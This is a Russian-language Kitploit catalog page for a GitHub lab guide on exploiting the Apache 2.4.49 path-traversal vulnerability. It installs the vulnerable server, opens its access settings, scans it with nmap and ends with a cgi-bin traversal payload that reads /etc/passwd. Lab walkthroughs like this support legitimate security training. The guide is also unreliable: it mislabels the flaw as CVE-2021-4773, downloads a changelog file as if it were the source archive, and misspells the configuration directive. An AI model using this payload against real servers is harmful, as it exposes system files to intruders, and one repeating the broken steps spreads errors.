Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2021-4773 — это практический пример того, как эксплуатировать уязвимость CVE-2021-4773 с помощью виртуальной машины | Kitploit
Инструменты/GitHubGitHub/alexs18/cve-2021-4773
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеЛаборатории и Практика
GitHubalexs18/cve-2021-4773

CVE-2021-4773

это практический пример того, как эксплуатировать уязвимость CVE-2021-4773 с помощью виртуальной машины

Репозиторий
9 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2021-4773

это практический пример эксплуатации уязвимости CVE-2021-4773 с помощью виртуальной машины

для этого руководства вам понадобится следующее

  • виртуальная машина Kali Linux
  • виртуальная машина Ubuntu Server
  • установите Apache версии 2.4.49

итак, начнем Когда у вас будут запущены 2 виртуальные машины, вы установите Apache версии 2.4.49 из архивного репозитория вы можете найти эту версию https://archive.apache.org/dist/httpd/CHANGES_2.4.49

Установка и настройка уязвимой версии на Ubuntu Server

1 Первым делом на вашей серверной виртуальной машине выполните следующую команду

root@kitploit:~
curl -k -L -s --compressed https://archive.apache.org/dist/httpd/CHANGES_2.4.49 > httpd-2.4.49.tar.bz2  or wget https://archive.apache.org/dist/httpd/CHANGES_2.4.49 > httpd-2.4.49.tar.bz2 

2 Затем вам нужно распаковать эту версию Apache, как показано ниже

root@kitploit:~
tar -xvjf httpd-2.4.49.tar.bz2

3 Установите следующие пакеты

root@kitploit:~
sudo apt install build-essential libpcre3 libpcre3-dev libapr1-dev libaprutil1-dev libssl-dev

4 Запустите исполняемый файл в главном каталоге (файл с именем configure), используйте флаг для указания каталога установки

root@kitploit:~
./configure --prefix=/usr/local/apache2

5 Скомпилируйте уязвимую версию

root@kitploit:~
make

6 Установите уязвимую версию

root@kitploit:~
make install

7 Проверьте версию

root@kitploit:~
ls /usr/local/apache2

8 Запустите процесс

root@kitploit:~
/usr/local/apache2/bin/apachectl start
  

9 Проверьте процесс

root@kitploit:~
ps aux | grep httpd

10 Настройте уязвимость Найдите файл /usr/local/apache2/conf/httpd.conf и настройте каталог admin Найдите тег Directory и измените Require all denied на

root@kitploit:~
  Required all granted
  

Найдите тег Files .ht* и измените Require all denied на

root@kitploit:~
  Required all granted

Первое изменение предназначено для эксплуатации уязвимости в локальной среде, а второе — для раскрытия в реальной среде

Эксплуатация уязвимости в Kali Linux

1 Просканируйте IP-адрес с помощью nmap с помощью следующей команды

root@kitploit:~
nmap -sV ip_address

2 Выполните curl или wget для проверки сервера Apache

root@kitploit:~
curl ip_address or make wget ip_address

3 Изучите, как эксплуатировать уязвимость, на следующей странице, если хотите понять синтаксис

root@kitploit:~
https://www.picussecurity.com/resource/blog/simulate-apache-cve-2021-41773-exploits-vulnerability

или просто используйте следующий пэйлоад

root@kitploit:~
http://$host/cgi-bin/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
Скачать инструмент